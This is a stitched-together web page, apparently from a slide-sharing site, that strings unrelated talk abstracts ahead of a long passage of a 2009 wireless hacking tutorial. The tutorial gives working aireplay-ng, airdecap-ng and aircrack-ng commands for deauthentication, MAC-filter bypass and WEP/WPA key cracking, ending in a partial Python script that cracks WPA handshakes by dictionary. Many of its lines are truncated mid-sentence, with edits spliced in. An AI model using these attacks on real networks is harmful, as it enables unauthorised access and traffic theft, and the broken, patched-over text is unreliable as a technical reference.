This paper introduces practical techniques used by hackers to break wireless security.
We recommend that the reader have basic knowledge of wireless operation.
WiFi practical hacking "Show me the passwords!" (DefCamp)
Konrad Jędrzejczyk in Bucharest, Romania on November 8-9th 2018 at DefCamp #9.
The videos and other presentations can be found on https://def.camp/archive
Speaker: Paul Vixie
The Domain Name System (DNS) offers an excellent view of local and global networks, which makes it possible to study the activities of cybercriminals and their attack methods. The talk will show how to secure DNS and how to use it to protect other connected assets. The speaker will cover in detail DNS cache poisoning, the DNS Security Extensions (DNSSEC), DDoS attacks, rate limiting, DNS firewalls and passive DNS monitoring.
Please note, this article does not intend to promote hacking. The intention is to help you understand the vulnerabilities in SSL and protect yourselves from them. There are millions of innocent victims who fall prey because they are complacent the moment they see a 'secure https' symbol in their browser. I am trying to dispel that myth.
DIY Internet: Snappy, Secure Networking with MinimaLT (JSConf EU 2013) (Igalia)
By Andy Wingo.
Refreshing your Twitter feed is such a drag over 3G, taking forever to connect and fetch those precious kilobytes. The reasons for this go deep into the architecture of the internet: making an HTTPS connection simply has terrible latency.
So let’s fix the internet! MinimaLT is an exciting new network protocol that connects faster than TCP, is more secure than TLS (crypto by DJ Bernstein), and allows mobile devices to keep connections open as they change IP addresses. This talk presents the MinimaLT protocol and a Node library that allows JS hackers to experimentally build a new Internet.
JavaFest. Nanne Baars. Web application security for developers (FestGroup)
Security is an important topic for developers; however, security is often an afterthought in a project. This presentation will focus on practices which developers need to be aware of, and make security fun again. This is an in-depth talk about 10 topics, not an overview of security best practices.
Transforming Security: Containers, Virtualization and Softwarization (Priyanka Aash)
This session will explore how we can leverage containers, network/endpoint virtualization technologies and virtualized security instrumentation, concurrently, to transformationally improve security visibility, security analytics, system resilience and actionable context, greatly increasing our ability to attest that systems will be secure and compliant in any state into which they may be driven.
(Source: RSA USA 2016-San Francisco)
Admins and developers like PowerShell, but hackers like it most of all. Being the native shell of Windows systems, it does not attract attention while offering enormous offensive capabilities. During the talk Paweł will present both effective one-liners and multi-line scripts that can wreak havoc in an unprepared organization. There will be interesting C2 channels, malware written entirely in PowerShell, finding and exploiting poorly configured MSSQL servers, etc. 100% meat, no filler.
Linux Server Hardening - Step by Step (Sunil Paudel)
Linux Server Hardening
This document describes, step by step, how the server was hardened. We used the Metasploitable server, the vulnerable Ubuntu server designed to be hacked, and performed the hardening on it. We stopped all unnecessary services and closed unneeded ports. We assumed the server to be a web server only; hence, only ports 80 and 443 are left open. Then the firewall rules were set, followed by Apache web server hardening, encryption of folders and files, disabling unwanted users, and enforcing password policies.
From Kernel Space to User Heaven #NDH2k13 (Jaime Sánchez)
FROM KERNEL SPACE TO USER HEAVEN at NUIT DU HACK 2013 by JAIME SANCHEZ
More information at:
Twitter: @segofensiva
Website: http://www.seguridadofensiva.com
What if you could enqueue all your incoming and outgoing network connections from kernel space to user space? Maybe you could develop some offensive/defensive applications to modify headers and payloads in real time, to detect unauthorized traffic such as DNS tunneling connections, or to fool some well-known network tools. This will be shown on Linux-powered devices. Some remote OS fingerprinting techniques, both active and passive, as implemented in tools like nmap, p0f, or vendor appliances, will also be explained, along with how to defeat them. This technique doesn't need virtual machines or kernel patches, and is highly portable to other platforms.
Derevolutionizing OS Fingerprinting: The cat and mouse game (Jaime Sánchez)
With the explosive growth and distributed nature of computer networks, it has become progressively more difficult to manage, secure, and identify Internet devices. An outsider has the capability to discover general information, such as which operating system a host is running, by searching for default stack parameters, ambiguities in IETF RFCs or non-compliant TCP/IP implementations in responses to malformed requests. By pinpointing the exact OS of a host, an attacker can launch an educated and precise attack against a target machine.
There are a lot of reasons to hide your OS from the entire world:
Revealing your OS makes it easier to find and successfully run an exploit against any of your devices.
Having an unpatched or antique OS version is not very good for your company's prestige. Imagine that your company is a bank and some users notice that you are running an unpatched box. They won't trust you any longer! In addition, this kind of 'bad' news always reaches public opinion.
Knowing your OS can also become more dangerous, because people can guess which applications you are running on that OS (data inference). For example, if your system is MS Windows and you are running a database, it's highly likely that you are running MS-SQL.
It could be convenient for other software companies to offer you a new OS environment (because they know which one you are running).
And finally, privacy: nobody needs to know which systems you've got running.
This talk aims to present well-known methods that perform classification using application-layer traffic (TCP/IP/UDP headers, ICMP packets, or some combination thereof), old-style approaches to defeating remote OS fingerprinting (like tweaking the Windows registry or applying patches to the Linux kernel), and why these don't work nowadays and could affect TCP/IP stack performance. We'll also present a new approach to detecting and defeating both active and passive OS fingerprinting with OSfooler-NG, a completely rewritten tool, highly portable, completely undetectable by the attackers and capable of detecting and defeating famous tools like nmap, p0f, Xprobe, pfSense and many commercial engines.
Sorry guys, OS fingerprinting is over...
In the past, malware research was rather passive. Researchers received malware samples from customers, industry partners, and honeypots, and would analyze the files in a network-isolated environment. These researchers would find indicators of compromise and develop detection signatures for the malware, then move on to the next sample.
Today, malware research often falls under the umbrella of security intelligence research. In addition to analyzing malware samples, researchers now need to actively interact with malicious actors’ servers. Whether it’s to monitor malicious actors’ Command-and-Control servers, download the actors’ malware for analysis, or read the actors’ blogs in order to harvest actionable intelligence, researchers today are not working in network-isolation.
However, as more and more researchers are now working from home, the notion of exposing one’s home IP address to an adversary is rather unsavory, especially when dealing with organized crime syndicates and nation-state adversaries. As such, researchers need a way to anonymously communicate with servers operated by hostile entities.
This whitepaper discusses a new software project named Tortilla, which is designed to allow researchers to easily, safely, and securely use Tor to anonymously communicate over the Internet.
End-to-End Analysis of a Domain Generating Algorithm Malware Family Whitepaper (CrowdStrike)
Select malware families have used Domain Generating Algorithms (DGAs) over the past few years in an effort to evade traditional domain blacklists, allow for fast-flux domain registration and usage, and evade analysts’ abilities to predict attackers’ control servers. While novel work has been done by both private industry and academia with respect to detecting DGA-related network traffic, this whitepaper demonstrates end-to-end analysis of a DGA malware family, from binary deobfuscation to DGA analysis, to sinkholing, to domain registrant research, to investigative findings on the malware’s author and his accomplices.
On February 26, 2013, a major American financial services firm received a suspicious email containing a file attachment with subject line, “Hi [redacted] has sent you images.” The firm’s CISO submitted the file attachment to CrowdStrike on February 28, 2013 for analysis. CrowdStrike found that the file attachment was a heavily obfuscated Trojan downloader, part of a large malware family designed to download other malware from websites based on a time-seeded domain-generating algorithm.
The malware family discussed in this whitepaper has thousands of active variants currently running on the Internet and until recently has managed to stay off of the radar of all antivirus firms. This whitepaper brings to light how this malware is tied to an underground campaign that has been active for at least the past six years.
Presentation for the Postgraduate Programme in Information Security:
- Sniffing plain-text passwords;
- Brute-force attack on SSH;
- Protection: firewall, IPS and/or TCP Wrappers;
- Basic security in sshd_config;
- RSA/DSA keys for remote access;
- SSH looking up keys in LDAP;
- Why to restrict access: Fork Bomb
Security PWNing 2018 - Penthertz: The use of radio attacks during redteam tests (📡 Sebastien Dudek)
Presentation made at SecurityPWNing 2018 explaining how to intrude into a company using radio attacks, and real-case scenarios we encountered during our tests.
Park Quantification Of Aesthetic Viewing Using Eye Tracking Technology The In... (Kalle)
The purpose of this study is to explore how the viewers’ previous training is related to their aesthetic viewing in various interactions with the form and the context, in relation to apparel design. Berlyne’s two types of exploratory behavior, diversive and specific, provided a theoretical framework to this study. Twenty female subjects (mean age=21, SD=1.089) participated. Twenty model images, posed by a male and a female model, were shown on an eye-tracker screen for 10 seconds each. The findings of this study verified Berlyne’s concepts of visual exploration. One of the different findings from Berlyne’s theory was that the untrained viewers’ visual attention tended to be more significantly focused on peripheral areas of visual interest, compared to the trained viewers, while there was no significant difference on the central, foremost areas of visual interest between the two groups. The overall aesthetic viewing patterns were also identified.
Takemura Estimating 3 D Point Of Regard And Visualizing Gaze Trajectories Und... (Kalle)
The portability of an eye tracking system encourages us to develop a technique for estimating 3D point-of-regard. Unlike conventional methods, which estimate the position in the 2D image coordinates of the mounted camera, such a technique can represent richer gaze information of the human moving in the larger area. In this paper, we propose a method for estimating the 3D point-of-regard and a visualization technique of gaze trajectories under natural head movements for the head-mounted device. We employ visual SLAM technique to estimate head configuration and extract environmental information. Even in cases where the head moves dynamically, the proposed method could obtain 3D point-of-regard. Additionally, gaze trajectories are appropriately overlaid on the scene camera image.
Wireless Pentesting: It's more than cracking WEP (Joe McCray)
This presentation walks you through the fundamentals of attacking and defending wireless networks.
Attacking WEP, WPA, WPA2, WPA Enterprise and captive portals is covered, and this presentation will be updated periodically. So keep checking back for updates.
This ppt covers what wireless hacking is, the types of Wi-Fi security (e.g. WEP, WPA, WPA/PSK) and the terms related to them. It also covers how wireless networks are cracked, and the tools and commands required for it. This is very useful. Catch it..... :)
International Conference On Electrical and Electronics Engineering (anchalsinghdm)
ICGCET 2019 | 5th International Conference on Green Computing and Engineering Technologies. The conference will be held on 7th September - 9th September 2019 in Morocco. International Conference On Engineering Technology
The conference aims to promote the work of researchers, scientists, engineers and students from across the world on advancement in electronic and computer systems.
How to Hack WPA/WPA2 Wi Fi with Kali Linux. Kali Linux can be used for many things, but it probably is best known for its ability to penetration test, or “hack,” WPA and WPA2 networks.
Warning..!! WIFI hacking is illegal. "This ppt is only for educational purposes. I am not responsible for any consequences."
Pentesting Wireless Networks and Wireless Network Security (Ayoma Wijethunga)
Regardless of residential or corporate environments, wireless networking has been trending, bringing WLAN equipment revenue up to $5.2 billion in 2015. Unlike wired networks, wireless networks go beyond the walls, and could transmit your corporate or personal data in a way anyone else can eavesdrop on. With the quick adoption of wireless networking, control of smart devices, including smart home devices and smart cars, might end up in the hands of a blackhat hacker. Looking from a different angle, every time you connect to an untrusted wireless network, a malicious attacker might be listening to your communication.
This session will technically discuss security risks associated with wireless networks, with near real-life demonstrations. Different network security mechanisms and their weaknesses will be discussed. Towards the end of the session, we will be discussing best practices that should be followed to secure wireless networks and your data over wireless networks.
Demonstrations will include the following.
* Wireless network discovery and probing
* Wireless network attacks (WEP/WPA/WPS)
* Using OpenWrt open source firmware in wireless security
* Rogue wireless access points (MitM/Traffic Logging)
Welcome to the world of 'network security' which is an unavoidable term in cyber security. This white paper of Network security encompasses the most significant and predominantly used networking security concepts which are highly important for maintaining your network environment secure.
Shameful secrets of proprietary network protocols (Slawomir Jasek)
There is a big bunch of tools offering HTTP/SSL traffic interception. However, when it comes to penetration tests of specialized embedded software or thick clients, we often encounter proprietary protocols with no documentation at all: binary TCP connections, unlike anything else, impossible to adapt to a well-known local proxy. Without disassembling the protocol, pentesting the server backend is very limited. Though, based on our experience, it very often hides a shameful secret - completely unsecured mechanisms breaking all secure coding practices.
To demonstrate, we will show a few case-studies - most interesting examples from real-life industry software, which in our opinion are a quintessence of "security by obscurity". We will challenge the security of proprietary protocols in pull printing solutions, FOREX trading software, remote desktops and home automation technologies.
Due to fast-growing mobile application trends along with business competition, the lack of security concern in mobile development has become a critical issue which may lead to reputation damage, financial loss and non-compliance (e.g. privacy and cybersecurity laws). It's time to focus on Mobile Defense-in-Dev(Depth)!!
The talk will provide real-world case studies of mobile application threats, together with cybersecurity risk mitigation using a secure development standard and guideline which should be integrated into the development process.
The session will present the risks of insecure mobile application development of various types, with demonstrations: client side, communication channel and server side. The presentation includes case studies of insecure development practices which let an attacker abuse the vulnerable application (e.g. coin/gem cheating in a gaming app, bypassing security controls on the client side and the server side).
TL;DR
Motivation
Dynamic binary instrumentation
FRIDA
DBI without rooting / jailbreaking
Unleash the power of Frida
Case study for runtime exploitation
Countermeasure
References
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality (Inflectra)
In this insightful webinar, Inflectra explores how artificial intelligence (AI) is transforming software development and testing. Discover how AI-powered tools are revolutionizing every stage of the software development lifecycle (SDLC), from design and prototyping to testing, deployment, and monitoring.
Learn about:
• The Future of Testing: How AI is shifting testing towards verification, analysis, and higher-level skills, while reducing repetitive tasks.
• Test Automation: How AI-powered test case generation, optimization, and self-healing tests are making testing more efficient and effective.
• Visual Testing: Explore the emerging capabilities of AI in visual testing and how it's set to revolutionize UI verification.
• Inflectra's AI Solutions: See demonstrations of Inflectra's cutting-edge AI tools like the ChatGPT plugin and Azure Open AI platform, designed to streamline your testing process.
Whether you're a developer, tester, or QA professional, this webinar will give you valuable insights into how AI is shaping the future of software delivery.
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024 (Tobias Schneck)
As AI technology is pushing into IT, I was wondering, as an "infrastructure container Kubernetes guy", how does this fancy AI technology get managed from an infrastructure operational view? Is it possible to apply our lovely cloud native principles as well? What benefits could both technologies bring to each other?
Let me take these questions and provide you with a short journey through existing deployment models and use cases for AI software. Using practical examples, we discuss what cloud/on-premise strategy we may need to apply it to our own infrastructure and get it to work from an enterprise perspective. I want to give an overview of infrastructure requirements and technologies, and of what could be beneficial or limiting for your AI use cases in an enterprise environment. An interactive demo will give you some insights into what approaches I have already got working for real.
Accelerate your Kubernetes clusters with Varnish Caching (Thijs Feryn)
A presentation about the usage and availability of Varnish on Kubernetes. This talk explores the capabilities of Varnish caching and shows how to use the Varnish Helm chart to deploy it to Kubernetes.
This presentation was delivered at K8SUG Singapore. See https://feryn.eu/presentations/accelerate-your-kubernetes-clusters-with-varnish-caching-k8sug-singapore-28-2024 for more details.
The Art of the Pitch: WordPress Relationships and Sales (Laura Byrne)
Clients don't know what they don't know. What web solutions are right for them? How does WordPress come into the picture? How do you make sure you understand scope and timeline? What do you do if something changes?
All these questions and more will be explored as we talk about matching clients’ needs with what your agency offers without pulling teeth or pulling your hair out. Practical tips, and strategies for successful relationship building that leads to closing the deal.
Connector Corner: Automate dynamic content and events by pushing a button (DianaGray10)
Here is something new! In our next Connector Corner webinar, we will demonstrate how you can use a single workflow to:
Create a campaign using Mailchimp with merge tags/fields
Send an interactive Slack channel message (using buttons)
Have the message received by managers and peers along with a test email for review
But there’s more:
In a second workflow supporting the same use case, you’ll see:
Your campaign sent to target colleagues for approval
If the “Approve” button is clicked, a Jira/Zendesk ticket is created for the marketing design team
But—if the “Reject” button is pushed, colleagues will be alerted via Slack message
Join us to learn more about this new, human-in-the-loop capability, brought to you by Integration Service connectors.
And...
Speakers:
Akshay Agnihotri, Product Manager
Charlie Greenberg, Host
UiPath Test Automation using UiPath Test Suite series, part 3 (DianaGray10)
Welcome to UiPath Test Automation using UiPath Test Suite series part 3. In this session, we will cover desktop automation along with UI automation.
Topics covered:
UI automation introduction
UI automation sample
Desktop automation flow
Pradeep Chinnala, Senior Consultant Automation Developer @WonderBotz and UiPath MVP
Deepak Rai, Automation Practice Lead, Boundaryless Group and UiPath MVP
Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti... (Jeffrey Haguewood)
Sidekick Solutions uses Bonterra Impact Management (fka Social Solutions Apricot) and automation solutions to integrate data for business workflows.
We believe integration and automation are essential to user experience and the promise of efficient work through technology. Automation is the critical ingredient to realizing that full vision. We develop integration products and services for Bonterra Case Management software to support the deployment of automations for a variety of use cases.
This video focuses on the notifications, alerts, and approval requests using Slack for Bonterra Impact Management. The solutions covered in this webinar can also be deployed for Microsoft Teams.
Interested in deploying notification automations for Bonterra Impact Management? Contact us at sales@sidekicksolutionsllc.com to discuss next steps.
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo... (James Anderson)
Effective Application Security in Software Delivery lifecycle using Deployment Firewall and DBOM
The modern software delivery process (or the CI/CD process) includes many tools, distributed teams, open-source code, and cloud platforms. Constant focus on speed to release software to market, along with the traditional slow and manual security checks has caused gaps in continuous security as an important piece in the software supply chain. Today organizations feel more susceptible to external and internal cyber threats due to the vast attack surface in their applications supply chain and the lack of end-to-end governance and risk management.
The software team must secure its software delivery process to avoid vulnerability and security breaches. This needs to be achieved with existing tool chains and without extensive rework of the delivery processes. This talk will present strategies and techniques for providing visibility into the true risk of the existing vulnerabilities, preventing the introduction of security issues in the software, resolving vulnerabilities in production environments quickly, and capturing the deployment bill of materials (DBOM).
Speakers:
Bob Boule
Robert Boule is a technology enthusiast with PASSION for technology and making things work along with a knack for helping others understand how things work. He comes with around 20 years of solution engineering experience in application security, software continuous delivery, and SaaS platforms. He is known for his dynamic presentations in CI/CD and application security integrated in software delivery lifecycle.
Gopinath Rebala
Gopinath Rebala is the CTO of OpsMx, where he has overall responsibility for the machine learning and data processing architectures for Secure Software Delivery. Gopi also has a strong connection with our customers, leading design and architecture for strategic implementations. Gopi is a frequent speaker and well-known leader in continuous delivery and integrating security into software delivery.
Essentials of Automations: Optimizing FME Workflows with Parameters (Safe Software)
Are you looking to streamline your workflows and boost your projects’ efficiency? Do you find yourself searching for ways to add flexibility and control over your FME workflows? If so, you’re in the right place.
Join us for an insightful dive into the world of FME parameters, a critical element in optimizing workflow efficiency. This webinar marks the beginning of our three-part “Essentials of Automation” series. This first webinar is designed to equip you with the knowledge and skills to utilize parameters effectively: enhancing the flexibility, maintainability, and user control of your FME projects.
Here’s what you’ll gain:
- Essentials of FME Parameters: Understand the pivotal role of parameters, including Reader/Writer, Transformer, User, and FME Flow categories. Discover how they are the key to unlocking automation and optimization within your workflows.
- Practical Applications in FME Form: Delve into key user parameter types including choice, connections, and file URLs. Allow users to control how a workflow runs, making your workflows more reusable. Learn to import values and deliver the best user experience for your workflows while enhancing accuracy.
- Optimization Strategies in FME Flow: Explore the creation and strategic deployment of parameters in FME Flow, including the use of deployment and geometry parameters, to maximize workflow efficiency.
- Pro Tips for Success: Gain insights on parameterizing connections and leveraging new features like Conditional Visibility for clarity and simplicity.
We’ll wrap up with a glimpse into future webinars, followed by a Q&A session to address your specific questions surrounding this topic.
Don’t miss this opportunity to elevate your FME expertise and drive your projects to new heights of efficiency.
GraphRAG is All You need? LLM & Knowledge Graph (Guy Korland)
Guy Korland, CEO and Co-founder of FalkorDB, will review two articles on the integration of language models with knowledge graphs.
1. Unifying Large Language Models and Knowledge Graphs: A Roadmap.
https://arxiv.org/abs/2306.08302
2. Microsoft Research's GraphRAG paper and a review paper on various uses of knowledge graphs:
https://www.microsoft.com/en-us/research/blog/graphrag-unlocking-llm-discovery-on-narrative-private-data/
JMeter webinar - integration with InfluxDB and Grafana (RTTS)
Watch this recorded webinar about real-time monitoring of application performance. See how to integrate Apache JMeter, the open-source leader in performance testing, with InfluxDB, the open-source time-series database, and Grafana, the open-source analytics and visualization application.
In this webinar, we will review the benefits of leveraging InfluxDB and Grafana when executing load tests and demonstrate how these tools are used to visualize performance metrics.
Length: 30 minutes
Session Overview
-------------------------------------------
During this webinar, we will cover the following topics while demonstrating the integrations of JMeter, InfluxDB and Grafana:
- What out-of-the-box solutions are available for real-time monitoring JMeter tests?
- What are the benefits of integrating InfluxDB and Grafana into the load testing stack?
- Which features are provided by Grafana?
- Demonstration of InfluxDB and Grafana using a practice web application
To view the webinar recording, go to:
https://www.rttsweb.com/jmeter-integration-webinar
Securing your Kubernetes cluster: a step-by-step guide to success! (KatiaHIMEUR1)
Today, after several years of existence, an extremely active community and an ultra-dynamic ecosystem, Kubernetes has established itself as the de facto standard in container orchestration. Thanks to a wide range of managed services, it has never been so easy to set up a ready-to-use Kubernetes cluster.
However, this ease of use means that the subject of security in Kubernetes is often left for later, or even neglected. This exposes companies to significant risks.
In this talk, I'll show you step-by-step how to secure your Kubernetes cluster for greater peace of mind and reliability.
Wi-Foo Ninjitsu Exploitation
Vulnerability analysis, Security Papers, Exploit Tutorials http://www.exploit-db.com/papers/12956/
|=--------------------------------------------------------------------=|
|=----------------=[ Wi-Foo Ninjitsu Exploitation ]=---------------=|
|=-----------------------=[ 24 February 2009 ]=-----------------------=|
|=---------------------=[ By CWH Underground ]=---------------------=|
|=--------------------------------------------------------------------=|
######
Info
######
Title : Wi-Foo Ninjitsu Exploitation
Author : JabAv0C && ZeQ3uL
Team : CWH Underground [www.milw0rm.com/author/1456]
Website : cwh.citec.us / www.citec.us
Date : 2009-02-24
##########
Contents
##########
[0x00] - Introduction
[0x01] - Security of Wireless network
[0x02] - Breaking the Simple Defenses
[0x02a] - Mac Filtering
[0x02b] - Discover Hidden SSID
[0x02c] - Sniffing informations on the Air
[0x03] - Get closer with cracking tool
[0x03a] - Aircrack-ng suite
[0x03b] - Decrypt packet with airdecap-ng
[0x03c] - Decloak packet with airdecloak-ng
[0x03d] - AirCracking 101
[0x04] - Owned the WEP Key with Simple Technique (No Injection)
[0x04a] - Capturing method
[0x04b] - Cracking method
[0x05] - Owned the WEP Key with Advanced Technique (With Inject Method)
[0x05a] - Monitor Mode
[0x05b] - Fake Authentication
[0x05c] - Arp Replay Attack
[0x05d] - Fragmentation Attack
[0x05e] - Korek ChopChop Attack
[0x05f] - Packetforge
[0x05g] - ARP Request Replay with Interactive Attack
[0x05h] - Cracking WEP Key
[0x06] - Conclusion steps for cracking WEP
[0x07] - Owned the WPA-PSK/WPA2-PSK Key
[0x08] - Exploiting Wireless Enterprise (WPA-TLS/TTLS/PEAP)
[0x09] - Exploiting CISCO LEAP
[0x10] - Mass Exploit with Karmetasploit
[0x11] - References
[0x12] - Greetz To
#######################
[0x00] - Introduction
#######################
This paper introduce practical techniques used by hackers to break the wireless security.
We recommend that the reader should have basic knowledge of wireless operation.
This paper has 13 sections; the practical content is in sections 0x02 to 0x10.
Section 0x02 covers basic attacks on wireless networks. Section 0x03 describes the
tools used throughout this tutorial. Sections 0x04, 0x05 and 0x06 explain how to crack WEP.
Sections 0x07, 0x08 and 0x09 detail cracking WPA and WPA2. Section 0x10 covers
using Metasploit on a wireless network through a rogue AP.
#######################################
[0x01] - Security of Wireless Network
#######################################
1 of 12 12/24/10 5:48 PM
A wireless network has a serious drawback compared with a wired network because it uses the air as its medium, so hackers are capab
by using the man-in-the-middle method or others.
Therefore, security is a major concern in wireless networks, and to date the wireless security standards can be divided like this:
- WEP
- WPA-PSK
- WPA2-PSK
- WPA-802.1x
- WPA2-802.1x
WEP is the original security standard for wireless networks, but it is cracked easily. WPA and WPA2 were offered to increase
and solve the vulnerabilities in WEP. WPA and WPA2 are further divided into Pre-Shared Key and 802.1X, which are used for personal and
respectively. In addition to these standards, there are other mechanisms to enhance wireless security, such as hidden SSID, MAC fi
talk about hacking these security standards and mechanisms in this tutorial and also provide other attack methods which hackers
wireless network.
#######################################
[0x02] - Breaking the Simple Defenses
#######################################
++++++++++++++++++++++++++++++++
[0x02a] - Bypass MAC Filtering
++++++++++++++++++++++++++++++++
This is a basic security method: the MAC addresses of the legitimate clients are stored in the access point. When there is an authen
to the access point, the access point compares the requesting MAC address with the MAC addresses stored in its memory. If they match,
the authentication succeeds; otherwise it fails. However, this method is easy to bypass: the attacker only has to change
We have a case study of a MAC-filtering bypass. One day, we had a chance to do a wireless penetration t
First, we used Kismet to discover the access points around the company. This told us the exact location of each access
by fixing the channel for capturing packets. Fixing the target channel improves the efficiency of airodump-ng. We knew from air
the access point used open authentication and did not use any encryption. So we tried to connect to the access point, but
it rejected our authentication request. We concluded that this network used MAC filtering. From airodump-ng, we saw that there were clien
We immediately changed our MAC address to that of an associated client and tried to connect again. This time, everything
Moreover, we were able to access the internal network of this company and run any tools, such as nmap, Nessus and exploits, against
(Spoofing the MAC of a client that is still active makes the two stations collide; cloning a client that has left, or deauthenticating it first with aireplay-ng -0, is cleaner.)
++++++++++++++++++++++++++++++++
[0x02b] - Discover Hidden SSID
++++++++++++++++++++++++++++++++
In some environments, the wireless administrator configures a hidden SSID. So the attacker cannot know the SSID of the network
and also cannot connect to that network. In airodump-ng, it shows <length: ?> where ? is the length of the SSID.
The usual way to learn the SSID is from an association request (probe requests and responses carry it in the clear too). This packet occurs when a legitimate client conne
We are able to force a legitimate client to reconnect to the access point by sending a de-authentication packet to the client b
The command for doing that is like this:
#aireplay-ng -0 1 -a xx:xx:xx:xx:xx:xx -c zz:zz:zz:zz:zz:zz rausb0
21:56:47 Waiting for beacon frame (BSSID: xx:xx:xx:xx:xx:xx) on channel 11
21:56:47 Sending 64 directed DeAuth. STMAC: [zz:zz:zz:zz:zz:zz] [ 0| 0 ACKs]
After sending the de-authentication packet to the client, the client re-authenticates and re-associates.
Airodump-ng detects this process and learns the SSID of this network. (-a is the BSSID, -c the client MAC; the count 1 sends a single burst of 64 deauth frames, and 0 keeps sending until stopped.)
++++++++++++++++++++++++++++++++++++++++++++
[0x02c] - Sniffing informations on the Air
++++++++++++++++++++++++++++++++++++++++++++
This topic does not need any advanced technique or deep knowledge. Many wireless networks use open authentication wi
encryption mechanism. The attacker only needs to sniff packets from the air and find the credentials of protoco
telnet, FTP etc. These protocols do not have any encryption. So we can find the username and password just by looking at the ca
We are able to sniff other people's data by using airodump-ng (or any sniffer on the monitor-mode interface, since nothing is encrypted).
###########################################
[0x03] - Get closer with cracking tool
###########################################
We recommend using Aircrack-ng. Aircrack-ng is an 802.11 WEP and WPA-PSK key cracking program that can recover keys once
have been captured. It implements the standard FMS attack along with some optimizations like KoreK attacks, as well as the all-new
thus making the attack much faster compared to other WEP cracking tools. In fact, Aircrack-ng is a set of tools for auditing wirel
+++++++++++++++++++++++++++++
[0x03a] - Aircrack-ng suite
+++++++++++++++++++++++++++++
There are four tools in the aircrack-ng suite which play an important role in this tutorial.
- airodump-ng: used for capturing packets
Start airodump-ng first every time; the card must be in monitor mode (airmon-ng, see 0x05a), which is also what enables the injection capability of our card
- aireplay-ng: used for injection
o de-authentication: sends de-authentication packets to an associated client
o fake authentication: performs the fake authentication process
o interactive packet replay: lets us choose the preferred packet to replay
o arp replay: performs the ARP replay attack automatically
o Korek chopchop: generates a keystream using the chopchop technique
o fragment: generates a keystream using the fragmentation technique
- packetforge-ng: used to create packets
- aircrack-ng: used to recover the key
More detail: http://aircrack-ng.org/doku.php#aircrack-ng_suite1
+++++++++++++++++++++++++++++++++++++++++++
[0x03b] - Decrypt packet with airdecap-ng
+++++++++++++++++++++++++++++++++++++++++++
After we have the WEP or WPA key, sometimes we want to decrypt the captured packets. The Aircrack team has already
provided a tool for that, called "airdecap-ng". Examples of using airdecap-ng:
#airdecap-ng -b xx:xx:xx:xx:xx:xx workshop-01.cap
or
#airdecap-ng -e Workshop workshop-02.cap
The output of these commands is a file ending in "-dec.cap".
Note: without a key, airdecap-ng only selects by BSSID/ESSID and strips the 802.11 headers from unencrypted traffic; to actually decrypt, add -w <hex WEP key> for WEP, or -e <ESSID> -p <passphrase> for WPA. For WPA, airdecap-ng can only decrypt a file that contains the four-way handshake, because it needs the handshake nonces to derive the session key.
+++++++++++++++++++++++++++++++++++++++++++++
[0x03c] - Decloak packet with airdecloak-ng
+++++++++++++++++++++++++++++++++++++++++++++
Cloaking is a technique to disturb the WEP key cracking process. It is done by injecting packets which are
to the network; these packets are called "chaff". If the attacker captures these packets and does the cracking, the result wil
returned. However, the Aircrack team developed a tool to deal with this technique, called "airdecloak-ng".
#airdecloak-ng --bssid xx:xx:xx:xx:xx:xx -i workshop-01.cap
This command returns two files:
- workshop-01-filtered.cap: contains the filtered packets from the specified BSSID
- workshop-01-cloaked.cap: contains the cloaked packets from the specified BSSID
++++++++++++++++++++++++++++
[0x03d] - AirCracking 101
++++++++++++++++++++++++++++
PTW attack (-z)
(aircrack-ng -z capture.cap). Works only for 64/128-bit WEP keys and requires ARP request/reply packets that you mu
Dictionary attack (WPA/WPA2 passphrases)
(aircrack-ng -w pass.lst *.cap). The capture must contain a complete four-way handshake for the target ESSID; aircrack-ng runs PBKDF2 on every word, so wordlist quality matters more than raw speed.
Fudge factor (-f)
Once you reach 2 million IVs, try the fudge factor with "-f 4". Retry, increasing the fudge factor by adding 4 to it each time
** All the while, keep collecting data. Remember the golden rule: "The more IVs, the better." (The fudge factor only affects the FMS/KoreK mode, -K; since aircrack-ng 1.0 PTW is the default, so -z is no longer needed.)
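The dictionary attack listed above, worked through as an added example (this is not the paper's code and not aircrack-ng's implementation): derive the PMK from each candidate passphrase with PBKDF2, expand it to the PTK with the 802.11i PRF, and check the MIC of EAPOL message 2. The handshake is constructed in the file with an assumed passphrase "Workshop2009", constructed nonces and the BSSID/station MACs from the paper's aireplay-ng output, so the attack can be verified offline; nothing here reads a real .cap file.

```python
"""WPA/WPA2-PSK dictionary attack against a captured four-way handshake.

Added example, not from the CWH paper and not aircrack-ng's implementation.
The handshake is constructed below with a known passphrase so the attack can
be checked offline; in a real capture the fields come from the EAPOL frames
airodump-ng saved (message 1 gives ANonce, message 2 gives SNonce and MIC).
"""
import hashlib
import hmac
import struct

MIC_OFFSET = 81     # EAPOL hdr(4)+type(1)+key info(2)+key len(2)+replay(8)+nonce(32)+IV(16)+RSC(8)+ID(8)
SNONCE_OFFSET = 17  # nonce field starts after EAPOL hdr(4)+type(1)+key info(2)+key len(2)+replay(8)


def pmk_from_passphrase(passphrase, ssid):
    """IEEE 802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    The 4096 iterations are the whole cost of the attack; everything else is cheap."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk, ap_mac, sta_mac, anonce, snonce):
    """PTK = PRF-512(PMK, "Pairwise key expansion", min(AA,SPA)||max(AA,SPA)||min(AN,SN)||max(AN,SN))."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    ptk = b"".join(hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
                   for i in range(4))
    return ptk[:64]   # KCK = ptk[:16], KEK = ptk[16:32], TK = ptk[32:48]


def eapol_mic(kck, eapol):
    """MIC of an EAPOL-Key frame, computed over the frame with its own MIC field zeroed.
    The key descriptor version (low 3 bits of key info) selects the algorithm."""
    version = struct.unpack(">H", eapol[5:7])[0] & 0x7
    zeroed = eapol[:MIC_OFFSET] + bytes(16) + eapol[MIC_OFFSET + 16:]
    if version == 1:                                          # WPA / TKIP
        return hmac.new(kck, zeroed, hashlib.md5).digest()
    if version == 2:                                          # WPA2 / CCMP
        return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]
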